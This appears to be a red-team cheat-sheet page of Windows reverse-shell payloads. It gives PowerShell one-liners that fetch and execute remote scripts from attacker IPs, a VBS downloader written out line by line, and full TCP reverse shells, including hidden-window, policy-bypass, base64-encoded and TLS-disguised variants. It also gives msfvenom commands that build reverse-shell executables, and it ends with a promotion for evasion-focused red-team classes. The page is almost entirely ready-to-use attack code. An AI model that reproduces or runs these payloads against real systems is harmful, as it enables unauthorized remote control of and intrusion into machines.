Windows Reverse Shell

Windows Reverse Shells

Power of Powershell on Windows

Download Reverse Shells on the target machine:

Download and execute the script

powershell.exe -c iex(new-object system.net.webclient).downloadstring('http://10.10.10.10/powerrev.ps1'/

Run the shell in memory

powershell.exe iex(invoke-webrequest("http://10.10.10.10:8001/powerrev.ps1") -UseBasicParsing))

powershell.exe iex(iwr(http://10.10.10.10:8001/powerrev.ps1) -usebasicparsing)

Download the rev shell on the target and save it

powershell.exe Invoke-WebRequest http://10.10.10.10/powerrev.ps1 -OutFile c:\temp\powerrev.ps1
powershell.exe c:\temp\powerrev.ps1

Multiple ways to download and execute the shell on the victim system

iex (New-Object Net.Webclient).DownloadString('https://webserver/payload.ps1')																				
																	
$ie=New-Object -ComObject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.56.102:8002/shell.ps1');sleep 2;$response=$ie.Document.body.innerHTML;$ie.quit();$wshell = New-Object -ComObject wscript.shell;$wshell.AppActivate($OpenWindow.MainWindowTitle);Start-Sleep -Seconds 3;$wshell.SendKeys("{ENTER}");iex $response; iex $wshell

PSv3 onwards

iex (iwr 'http://192.168.230.1/evil.ps1')																				
																				
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET', 'http://192.168.56.102:8002/shell.ps1',$false);$h.send();iex $h.responseText																				
																				
$wr= [System.NET.WebRequest]::Create("http://192.168.56.102:8002/shell.ps1")																				
$r=$wr.GetResponse()																				
IEX([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()

Download shell with VBS

echo strUrl = WScript.Arguments.Item(0) > wget.vbs	
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs	
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs	
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs	
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs	
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs	
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs	
echo Err.Clear >> wget.vbs	
echo Set http = Nothing >> wget.vbs	
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs	
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs	
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs	
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs	
echo http.Open "GET", strURL, False >> wget.vbs	
echo http.Send >> wget.vbs	
echo varByteArray = http.ResponseBody >> wget.vbs	
echo Set http = Nothing >> wget.vbs	
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs	
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs	
echo strData = "" >> wget.vbs	
echo strBuffer = "" >> wget.vbs	
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs	
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs	
echo Next >> wget.vbs	
echo ts.Close >> wget.vbs

Some more powershell shells:

$LHOST = "10.10.10.10"; $LPORT = 9001; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.1.1',9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('10.10.1.1', 9001);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"

Base64 encode with nc -lvvnp 9001

powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQAwAC4AMQAwACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==

Powershell on TLS

$sslProtocols = [System.Security.Authentication.SslProtocols]::Tls12; $TCPClient = New-Object Net.Sockets.TCPClient('10.10.1.1', 9001);$NetworkStream = $TCPClient.GetStream();$SslStream = New-Object Net.Security.SslStream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$sslProtocols,$false);if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {$SslStream.Close();exit}$StreamWriter = New-Object IO.StreamWriter($SslStream);function WriteToStream ($String) {[byte[]]$script:Buffer = New-Object System.Byte[] 4096 ;$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()};WriteToStream '';while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()

Windows Stageless reverse TCP

msfvenom -p windows/shell_reverse_tcp LHOST=10.1.1.1 LPORT=4244 -f exe > reverse.exe

Windows Staged reverse TCP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f exe > reverse.exe

Note on Modern Security Protections and Advanced Tactics

While the reverse shell techniques outlined above are powerful tools in a red teamer’s arsenal, it’s important to note that modern security systems such as Endpoint Detection and Response (EDR) solutions have become adept at detecting and mitigating such activities. These protections are designed to analyze system behaviors and network traffic to block the known signatures and anomalous patterns associated with reverse shells.

However, advanced techniques do exist to bypass these protections, which often involve sophisticated methods such as memory injection, obfuscation, and the use of legitimate administrative tools to mimic normal user activities. These advanced methods are not only about evading detection but also about understanding and manipulating the underlying systems and security mechanisms.

To learn more about these advanced evasion techniques and to gain hands-on experience in deploying reverse shells while circumventing modern security defenses, we encourage participation in our live red team classes (sessions). These sessions are designed to provide deep insights into the latest red teaming tactics and real-world applications, enabling participants to stay ahead in the ever-evolving landscape of cybersecurity threats and defenses. Join us to transform your theoretical knowledge into practical expertise and master the art of invisible intrusion.

PreviousReverse Shell 101 NextReverse Shell References

Last updated 1 year ago